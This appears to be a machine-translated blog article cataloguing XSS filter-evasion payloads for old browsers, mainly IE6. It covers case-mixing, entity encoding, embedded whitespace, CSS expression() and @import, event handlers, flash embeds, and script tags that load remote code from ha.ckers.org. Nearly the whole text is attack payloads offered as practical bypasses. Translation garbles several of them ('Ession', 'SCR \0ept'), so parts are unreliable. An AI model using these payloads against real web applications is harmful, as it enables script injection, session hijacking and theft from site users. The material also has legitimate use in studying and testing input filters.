I. Title: common transformation of XSS-Development of XSS attacks
Ii. Summary:
This article analyzes common filtering and bypassing of XSS from the perspective of attackers, which is also a development process of XSS attacks.
Iii. Description:
I have summarized some examples of XSS attack and defense on the Internet into this article. Of course, it remains to be improved. Please correct me if you have any suggestions.
XSS does not have the versatility of browsers. Different browsers have different applications for the same XSS. In comparison, IE8 and Firefox are relatively safer, and they are more rigorous in filtering XSS attacks. The security of IE6 is normal. Even if the attacker's code is somewhat "distorted", the browser will still "do its best" to parse it. Some other browsers such as opera and XSS may have worse security processing.
This article is based on IE6 to analyze the deformation and bypassing of XSS. To provide targeted protection.
Iv. Details
The general original structure of XSS:
<Script> alert ("anyunix") </script>
The above construction method is too direct and easy to be filtered. In fact, for different filtering mechanisms of different sites, the proper deformation of the original structure can sometimes bypass a lot of XSS detection.
V. Development
1: It is very simple. Everyone knows that <script> will be filtered out, but the case is often ignored:
<SCripT> alert ("anyunix") </Script>
2: <script> it does not matter if it is completely filtered. Many objects support code execution in the form of "javascript:
3: After a simple javascript form is completely filtered out. We found that many objects support the "& # ASCII" representation method,
& #97 can be written as & #097, & #0097 until & #0000097 can also be executed.
& # X61 can also be written as & #061, & #0061 till & #000061.
4: If the encoding is restored and filtered, enter spaces, tabs, line breaks, and other blank characters:
5: You can also embed the encoded TAB key and so on. char09, char10, and char13 can all be embedded:
6: When "javascript" is used directly, we can use other properties to execute XSS.
<Div style = "width: expression (alert ('anyunix ');">
<STYLE> @ import 'HTTP: // ha.ckers.org/xss.css'; </STYLE>
7: Then, naturally, new bypass methods and utilization forms are derived.
A): Insert comments/*... */for interference
/* XSS */Ession (alert ('anyunix ') ">
B): Full-angle character interference
<Div style = "width:ExExpression (alert ('anyunix '); ">
C): "\" interference
<STYLE>@ Im \ po \ rt'Http: // ha.ckers.org/xss.css'; </STYLE>
8: if the direct execution is completely filtered, we will use the event to execute XSS.
<Body onload = alert ('anyunix ')>
<Isindex type = imagesrc = 1 onerror = alert ('anyunix ')>
9: flash can be used to execute XSS
<Embed src = "http://ha.ckers.org/xss.swf" AllowScriptAccess = "always"> </EMBED>
10: Other labels can also be used.
<Body background = "javascript: alert ('xss')">
<Link rel = "stylesheet" HREF = "http://ha.ckers.org/xss.css">
<Table background = "javascript: alert ('xss')">
Other bypass instances used for obfuscation, interference, and bypass:
<SCRIPTa = ">" SRC = "http://ha.ckers.org/xss.js"> </SCRIPT>
<SCRIPT = ">" SRC = "http://ha.ckers.org/xss.js"> </SCRIPT>
<SCRIPTa = "> '>" SRC = "http://ha.ckers.org/xss.js"> </SCRIPT>
Perl-e 'print "<SCR \ 0ip> alert (\" XSS \ ") </SCR \ 0ept>"; '> out
The above is some common and practical XSS bypass methods. In practical use, there are often a combination of multiple methods.
For more detailed XSS test scripts, see examples.
By: anyunix